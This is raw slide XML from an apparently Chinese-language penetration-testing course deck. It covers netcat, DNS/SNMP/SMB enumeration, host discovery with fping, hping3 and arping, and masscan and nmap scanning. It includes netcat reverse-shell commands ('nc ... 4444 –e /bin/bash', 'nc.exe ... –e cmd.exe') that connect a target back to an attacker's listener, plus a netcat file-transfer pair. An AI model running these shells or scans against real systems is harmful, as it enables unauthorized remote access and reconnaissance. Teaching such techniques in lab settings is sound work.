                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 8080&gt; /root/Desktop/transfer.txt  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>监听 写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>transfer.txt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dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc 192.168.100.107 8080 &lt;/root/Desktop/transfer.txt  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>攻击机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反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell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Nc –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lvvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 4444  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>攻击机监听  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目标主机 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc 192.168.100.113 4444 –e /bin/bash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Windows  nc.exe 192.168.100.113 4444 –e cmd.exe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没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>时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攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 4444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Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cohux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:3000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>代码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066" y="2997201"/>
            <a:ext cx="4417714" cy="33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dns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枚举服务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16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03062" y="1269578"/>
            <a:ext cx="6096000" cy="17091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dns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枚举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proxychains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 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dnsenum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 --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enum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 luxu.la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输出的信息显示了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DNS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服务的详细信息。其中，包括主机地址、域名服务地址和邮件服务地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003062" y="3088510"/>
            <a:ext cx="6096000" cy="2124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-- threads [number]  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允许你设置一次所运行的线程数量。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-r  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允许你开启递归查找。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-d  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允许你设置在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WHOIS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请求之间的时间延迟，单位为秒。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-o  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允许我们制定输出位置。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-w  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允许我们开启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WHOIS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查询。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003062" y="5492455"/>
            <a:ext cx="6096000" cy="879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查询子域名和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip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fierce -dns adomainnameontheinternet.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6581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snmp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枚举服务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17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6230" y="1568020"/>
            <a:ext cx="446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snmpwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -c public 192.168.41.138 -v 2c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85" y="2225956"/>
            <a:ext cx="4852837" cy="7132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36230" y="3695311"/>
            <a:ext cx="93391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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议查询开放端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>snmpwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -c public 192.168.10.200 -v 1 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep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tcpConnState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | cut -d“.” -f6 | sort  –nu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403891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路由跟踪工具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18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1204" y="1329673"/>
            <a:ext cx="70292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mtr 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tracroute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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> http://www.vdberg.org/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>richard/tcpping   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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mtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>curl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cip.cc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05" y="2962151"/>
            <a:ext cx="7029297" cy="29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网络探测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19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3732" y="1360438"/>
            <a:ext cx="6096000" cy="28243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fping –a –g 192.168.211.0/24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显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IP fping -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 10.225.113.70/27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显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>aliveIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> fping -ag 10.225.113.70/27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altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hping3 172.16.36.1 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>icmp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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>简单脚本探测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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> in $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 1 254); do hping3 172.16.36.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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -c 1 &gt;&gt; handle.txt &amp; done</a:t>
            </a:r>
          </a:p>
          <a:p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32" y="3871772"/>
            <a:ext cx="6256154" cy="26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3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				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>实训环境 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt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>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>环</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>境 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://cohux.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt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>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ctf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288" y="1270201"/>
            <a:ext cx="4723924" cy="35468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224" y="227783"/>
            <a:ext cx="1828804" cy="104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2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Smb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扫描</a:t>
            </a:r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2693" y="1647235"/>
            <a:ext cx="3231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nbtscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 192.168.1.2-100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93" y="2635102"/>
            <a:ext cx="4734923" cy="32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7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二层探索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1412" y="1526129"/>
            <a:ext cx="6784293" cy="1921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arping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>二层发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arping 172.16.36.135 -c 1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对结果使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>筛选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arping -c 5 192.168.211.1 | grep "reply from" | cut -d " " -f 4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12" y="3944597"/>
            <a:ext cx="8376630" cy="143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6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端口扫描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masscan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5874" y="1760306"/>
            <a:ext cx="6096000" cy="38010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使用方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pP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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>masscan -p80,8080-8100 10.0.0.0/8  --rate 1000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Banner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获取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>masscan 10.0.0.0/8 -p80 --banners --source-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip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x.x.x.x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配置文件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-c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860" y="2347874"/>
            <a:ext cx="3383573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9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nmap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3315" y="1414821"/>
            <a:ext cx="6096000" cy="8790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nmap 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脚本路径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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/share/nmap/scripts   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793315" y="2445653"/>
            <a:ext cx="7958799" cy="3607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端口状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  -Open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>开放的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>应用程序正在这个端口上监听连接。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  - Closed(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>关闭的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口对探测做出了响应，但是现在没有应用程序在监听这个端口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  - Filtered(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口没有对探测做出响应。同时告诉我们探针可能被一些过滤器（防火墙）终止了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  - Unfiltered(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>未被过滤的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口对探测做出了响应，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无法确定它们是关闭还是开放。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  - Open/Filtered: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口被过滤或者是开放的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无法做出判断。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  - Closed/Filtered: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口被过滤或者是关闭的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无法做出判断。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239547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nmap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常用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8206" y="1207027"/>
            <a:ext cx="7247373" cy="551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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10.0.0.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>这个网段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
